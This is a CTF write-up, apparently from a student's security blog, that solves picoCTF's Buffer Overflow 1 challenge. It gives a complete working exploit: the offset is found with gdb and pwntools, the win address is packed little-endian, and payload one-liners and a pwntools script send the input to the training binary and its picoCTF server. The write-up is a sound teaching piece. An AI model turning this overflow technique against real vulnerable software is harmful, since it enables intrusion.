Binary Exploitation

I learned a lot about buffer overflows in the Introduction to Information Security (IIS) course in OMSCS, so this post walks through a solution to an actual CTF problem.

Overview

In Introduction to Information Security (IIS), my second course in OMSCS, I solved a buffer overflow problem. I learned a lot from it, so I decided to write up a solution. For more details about the IIS course, please refer to the following article:

CS 6035 Introduction to Information Security

The buffer overflow problem I solve here is an actual CTF challenge. CTF (Capture the Flag) is a contest in which participants exploit vulnerabilities to capture flags. I chose picoCTF, an always-available CTF platform, because it had a problem that looked like a direct application of what I learned in class. picoCTF is aimed at middle and high school students, so many of its problems are said to be relatively simple. I solved the Buffer Overflow 1 problem in the Binary Exploitation category, working in the web shell after logging in to picoCTF.

picoCTF

Note: This post is not intended for actual attacks; the purpose of this introduction is to raise awareness of these types of attacks.

Source Code

Examining the source code, we see that main calls the vuln function, which uses gets to read input into the buffer buf. vuln also prints its own return address, which is the address where execution resumes after the function returns.

In addition, the win function is defined but never called from anywhere. The source code is as follows:

source_code

The return address is explained here:
Call Stack

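The gets function performs no bounds checking: it keeps reading until a newline or end of input, regardless of the size of the destination buffer. Input longer than buf therefore overwrites adjacent stack memory, which is what makes a buffer overflow possible.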
Essential Guide to the gets Function in C with 10 Clear Examples

Running the binary prints the return address of the vuln function, which is 0x804932f.

~$ ./vuln
Please enter your string: 
a
Okay, time to return... Fingers Crossed... Jumping to 0x804932f

Disassemble

To understand why the return address of the vuln function is 0x804932f, we can disassemble the compiled executable with objdump and inspect the assembly.

The following command disassembles the executable named vuln:

objdump -D vuln > vuln.asm

For instructions on how to disassemble an ELF executable file with the corresponding C source code using objdump, refer to the following link:

How to Disassemble an ELF Executable with C Source Code Using objdump

In the main section of vuln.asm, the call to vuln is at 0x804932a. A call instruction pushes the address of the next instruction onto the stack as the return address. This call is 5 bytes long (a one-byte opcode plus a four-byte relative offset), so the return address from vuln back to main is 0x804932a + 5 = 0x804932f.
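The relationship between the call site and the return address can be checked with a little arithmetic. The following is a minimal sketch: the helper name is made up for illustration, and the 5-byte length assumes the call to vuln is a near relative call (opcode plus 32-bit offset), which should be confirmed against the bytes shown in vuln.asm.

```python
# Length of a near relative call on 32-bit x86: 1 opcode byte + 4 offset bytes.
# Assumption: the call to vuln uses this encoding; verify it in vuln.asm.
CALL_REL32_LENGTH = 5


def return_address_after_call(call_address: int, length: int = CALL_REL32_LENGTH) -> int:
    """Return the address of the instruction that follows a call."""
    return call_address + length


print(hex(return_address_after_call(0x804932A)))  # 0x804932f
```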

To obtain the flag, we need to overwrite this return address with the address of the win function, so that a function that is never normally executed gets called.

disassemble_main

Debug

Plain gdb works for debugging, but its output is not very readable, so I installed gdb-peda by following the steps in the article below:
Using the gdb Debugger

As described in the article above, breakpoints are set with the b command. I set a breakpoint at the entry of the vuln function as follows. With gdb-peda, the registers, code, and stack are all displayed at once.

b *vuln

On entry to vuln, the top of the stack is at 0xfffef54c, and the value stored there is the return address, 0x804932f. The info frame command also reports the saved EIP (Extended Instruction Pointer) as 0x804932f, which, as the following quote explains, is the return address.

saved eip “0x804869a” is the so called “return address”, i.e., the instruction to resume in the caller stack frame after returning from this callee stack. It is pushed onto the stack upon the “CALL” instruction (save it for return).

How to interpret GDB “info frame” output?

gdb_vuln

When I entered the string test, gdb showed that the string “test” is stored at the address 0xfffef520.

gdb_input

To summarize, the return address of the vuln function is stored at 0xfffef54c. Because the stack grows toward lower addresses, the local buffer buf sits below it, at 0xfffef520. The distance between the two addresses is:

0xfffef54c - 0xfffef520 = 0x2c

This means the return address lies 44 bytes past the start of the buffer at 0xfffef520. An input consisting of 44 bytes of arbitrary characters followed by the address of the win function should therefore overwrite the return address.
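To make the layout concrete, here is a toy model of the stack region from buf up to the saved return address, written with the Python standard library only. It is a sketch, not real process memory: the bytearray, the helper names, and the filler bytes are illustrative assumptions, and only the two addresses and the original return address 0x804932f come from the debugging session above.

```python
import struct

RET_SLOT = 0xFFFEF54C  # stack address holding the saved return address
BUF_ADDR = 0xFFFEF520  # stack address where buf starts
OFFSET = RET_SLOT - BUF_ADDR  # 0x2c = 44 bytes

# Toy model of the memory from buf up to and including the return address.
frame = bytearray(OFFSET) + struct.pack("<I", 0x0804932F)


def unbounded_copy(memory: bytearray, data: bytes) -> None:
    """Copy data to the start of memory with no length check, as gets would."""
    memory[:len(data)] = data


def saved_return_address(memory: bytearray) -> int:
    """Read the 4-byte little-endian value stored at the return address slot."""
    return struct.unpack_from("<I", memory, OFFSET)[0]


# 44 filler bytes reach the slot; the next 4 bytes replace the return address.
unbounded_copy(frame, b"A" * OFFSET + b"BBBB")
print(OFFSET, hex(saved_return_address(frame)))  # 44 0x42424242
```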

Solution

The offset of the return address within the input, calculated above from the addresses, can also be found more efficiently with the Python library pwntools. Its cyclic function generates a pattern string in which every 4-byte substring is unique:

>>> from pwn import *
>>> cyclic(100)
b'aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaa'
>>> 

When I feed the generated pattern string to the target executable in gdb, I can see that the return address has been overwritten with 0x6161616c.

run <<< $(python3 -c 'import sys; sys.stdout.write("aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaa")')

gdb_padding

Since the return address has been overwritten with 0x6161616c, we can use the cyclic_find function to locate 0x6161616c within the generated pattern, that is, to find how many characters precede the bytes that land on the return address.

The prefix is 44 characters long, which confirms that the return address sits 44 bytes into the input, in agreement with the earlier address calculation. Therefore, we simply need to append the address of the win function to this string.

>>> cyclic(cyclic_find( 0x6161616c ))
b'aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaa'
>>> 
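For readers without pwntools installed, the idea behind cyclic and cyclic_find can be sketched with the standard library. This is not pwntools' code: the function names pattern and find_offset are hypothetical, and the lowercase alphabet with 4-character windows is an assumption inferred from the output shown above. The sketch builds a de Bruijn sequence, in which each 4-character window appears only once, and then searches for the bytes that ended up in the return address.

```python
import itertools
import string
import struct


def de_bruijn(alphabet: str, n: int):
    """Yield a de Bruijn sequence: each length-n window occurs only once."""
    k = len(alphabet)
    a = [0] * (k * n)

    def db(t, p):
        if t > n:
            if n % p == 0:
                for j in range(1, p + 1):
                    yield alphabet[a[j]]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    return db(1, 1)


def pattern(length: int, n: int = 4) -> bytes:
    """Return the first `length` bytes of the sequence over a-z."""
    chars = itertools.islice(de_bruijn(string.ascii_lowercase, n), length)
    return "".join(chars).encode()


def find_offset(value: int, length: int = 100) -> int:
    """Offset in the pattern of a 32-bit value as it was read from a register."""
    needle = struct.pack("<I", value)  # little-endian: 0x6161616c -> b"laaa"
    return pattern(length).find(needle)


print(find_offset(0x6161616C))  # 44
```

The value is converted to little-endian bytes before searching because the register shows the four pattern bytes in reversed order.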

To obtain the address of the win function, I went back to the disassembled vuln.asm. The win function starts at 0x080491f6, so this is the value to append to the 44-byte string.

disassemble_win

The address of the win function is 0x080491f6. However, x86 is little-endian, so multi-byte values are stored in memory starting from the least significant byte. The address must therefore be supplied in reversed byte order: \xf6\x91\x04\x08. The p32 function in pwntools performs this conversion:

>>> cyclic(cyclic_find( 0x6161616c )) + p32( 0x080491f6 )
b'aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaa\xf6\x91\x04\x08'
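The same byte order can be reproduced without pwntools. The snippet below is a small sketch using the standard struct module; the constant name WIN_ADDR is only for illustration.

```python
import struct

WIN_ADDR = 0x080491F6  # address of win taken from the disassembly

# "<I" means little-endian, unsigned 32-bit integer.
packed = struct.pack("<I", WIN_ADDR)
print(packed)  # b'\xf6\x91\x04\x08'

# int.to_bytes gives the same four bytes.
print(packed == WIN_ADDR.to_bytes(4, "little"))  # True

# Unpacking restores the original value.
print(hex(struct.unpack("<I", packed)[0]))  # 0x80491f6
```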

Therefore, by constructing the input as follows, it becomes possible to call the win function:

run <<< $(python3 -c 'import sys; sys.stdout.write("aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaa")'; echo -e '\xf6\x91\x04\x08')

The return address has been successfully overwritten with the address of the win function. When vuln returns, execution does not go back to main but jumps directly to win, which confirms that the exploit works.

gdb_payload

gdb_win
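As an alternative to assembling the input on the shell command line, the payload can be written to a file as raw bytes. This is a sketch under stated assumptions: write_payload and the file name payload.bin are hypothetical, and the filler byte is arbitrary. Writing in binary mode matters because printing a text string containing \xf6 may encode it as more than one byte, depending on the terminal encoding.

```python
import struct


def write_payload(path: str, offset: int, target: int) -> bytes:
    """Write `offset` filler bytes followed by the little-endian target address."""
    payload = b"A" * offset + struct.pack("<I", target)
    with open(path, "wb") as f:  # binary mode: bytes are written unchanged
        f.write(payload)
    return payload


if __name__ == "__main__":
    # payload.bin is a hypothetical file name chosen for this example.
    data = write_payload("payload.bin", 44, 0x080491F6)
    print(len(data))  # 48
```

Inside gdb, the file can then be supplied to the program with run < payload.bin.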

To retrieve the flag in picoCTF, the constructed input must be sent to the challenge instance. The following command obtains the flag:

(python3 -c 'import sys; sys.stdout.write("aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaa")'; echo -e '\xf6\x91\x04\x08') | nc saturn.picoctf.net <port>

When the flag can be obtained by passing input to the executable, the whole process can also be done in Python with the following script:

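import os

from pwn import *

# The target is a 32-bit x86 binary (4-byte addresses), so the arch is i386.
context.update(arch='i386', os='linux')

# 44 bytes of padding up to the saved return address
payload = cyclic(cyclic_find(0x6161616c))
# Address of win, packed as 4 little-endian bytes
payload += p32(0x080491f6)

# Start the local binary, send the payload, and show its output
p = process(os.getcwd() + "/vuln")
p.sendline(payload)
p.interactive()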

Summary of Pwntools Functions and Usage [Japanese] (https://qiita.com/8ayac/items/12a3523394080e56ad5a)

Reflection

This experience provided a great opportunity to touch on registers and assembly language. By performing debugging, I was able to verify the behavior of the stack and the role of the return address, which deepened my understanding of how programs operate. I believe that the knowledge gained from this experience will serve as a valuable introduction when I learn more in-depth topics in future OS classes.